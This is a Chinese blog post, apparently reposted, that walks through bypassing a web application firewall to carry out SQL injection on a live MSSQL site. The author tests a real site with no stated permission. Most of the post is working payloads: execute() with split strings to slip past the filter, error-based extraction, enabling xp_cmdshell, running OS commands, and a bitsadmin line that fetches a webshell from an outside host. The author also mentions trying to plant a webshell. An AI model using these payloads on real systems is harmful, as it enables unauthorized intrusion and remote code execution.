91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

MSSQL WAF繞過(2)

發布時間:2020-07-20 04:09:00 來源:網絡 閱讀:9191 作者:z2pp 欄目:安全技術

0x00 前言


上次的繞過太簡單,也沒有能注出數據或者獲取權限,這次繼續繞過,獲取數據

0x01 過程


還是上次的站點,簡單的判斷,存在注入
MSSQL WAF繞過(2)

發現and 數字、exec、union select、 select 數字。。。被過濾
MSSQL WAF繞過(2)

發現execute函數沒被過濾,狗沒出來說明這個函數能用
MSSQL WAF繞過(2)

execute('sql語句')  //execute函數中可以寫sql語句,且為字符串,那么就可以傳入一些變形字符串來繞過waf

本地驗證一下
MSSQL WAF繞過(2)
一些變形
MSSQL WAF繞過(2)

只是本次使用sql server堆疊注入,并不會將數據展示在頁面,所以要讓這一次的堆疊出錯,達到報錯注入的效果

execute('select convert(int,@@version)') --a

MSSQL WAF繞過(2)

當然需要變形一下,不然會被攔截,因為出現了select

execute('sel'%2b'ect convert(int,@@version)') --a   //在url編碼中 %2b 等價與 + 所以可以理解為 'sel' + 'ect'

MSSQL WAF繞過(2)

通過execute函數,可進行變形導致waf無法攔截,獲取數據或執行sql語句就變得簡單多了
執行cmdshell,由于cmdshell不能通過報錯回顯,但是可以將結果重定向到文件中或寫入表中

execute('master..xp_cmdshell whoami > e:\'%2b'\xx\'%2b'\1.txt')  // 雙斜杠被過濾

返回報錯并沒有關系,waf沒有攔截,查看1.txt是否有數據
MSSQL WAF繞過(2)

MSSQL WAF繞過(2)

0x02 后續

本來想寫入webshell或通過公網下載webshell,但服務器不能出外網,且有waf,導致寫shell失敗,考慮后想kill掉waf,但還是避免對服務器造成影響。。
MSSQL WAF繞過(2)

0x03 其他

附上其他在這次測試中用到的命令

execute('sp_configure "show advanced options",1')
execute('reconfigure')
execute('sp_configure "xp_cmdshell", 1')
execute('reconfigure')   //上述四步,使xp_cmdshell開啟

execute('master..xp_cmdshell "bitsadmin /transfer n http://xxxxx/1.aspx c:\\路徑\\123.aspx"')  //從公網下載webshell,本文中因機器不能出外網導致下載失敗
向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

米泉市| 革吉县| 米脂县| 左权县| 泰顺县| 襄汾县| 蒲城县| 嘉义市| 石林| 台湾省| 蓝山县| 石家庄市| 阜康市| 宾阳县| 和硕县| 石城县| 宁乡县| 沽源县| 松溪县| 正定县| 安吉县| 巴中市| 黄陵县| 云阳县| 芮城县| 永城市| 马鞍山市| 会东县| 绥宁县| 吴桥县| 长治市| 辽中县| 中超| 灵台县| 内黄县| 象州县| 乐安县| 呼伦贝尔市| 霍山县| 达拉特旗| 勐海县|